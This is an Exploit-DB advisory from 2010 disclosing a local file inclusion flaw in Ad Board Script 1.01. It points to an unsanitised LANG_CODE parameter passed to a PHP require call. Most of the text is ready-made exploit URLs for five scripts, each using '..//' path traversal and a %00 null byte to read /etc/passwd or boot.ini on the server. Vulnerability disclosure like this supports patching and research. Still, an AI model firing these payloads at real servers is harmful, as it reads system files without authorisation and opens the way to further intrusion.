Ad Board Script 1.01 - Local File Inclusion

EDB-ID:

11722




Platform:

PHP

Date:

2010-03-13


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

hi

-------

#########################local file include#################
Author: ItSecTeam

download from:http://www.phpkobo.com/scripts/AF201_101/AF201_101.zip

script:Ad Board Script

Version:1.01

Updated:2010-01-10

dork::D
##########################################

vul:/path/web/codelib/cfg/common.inc.php line 21:

require( "res.{$LANG_CODE}.sys.inc.php" );

-----------------------------------------

xpl:/path/web/codelib/cfg/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/codelib/sys/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/file.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/app/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

########################

discovered by ahmadbady

########################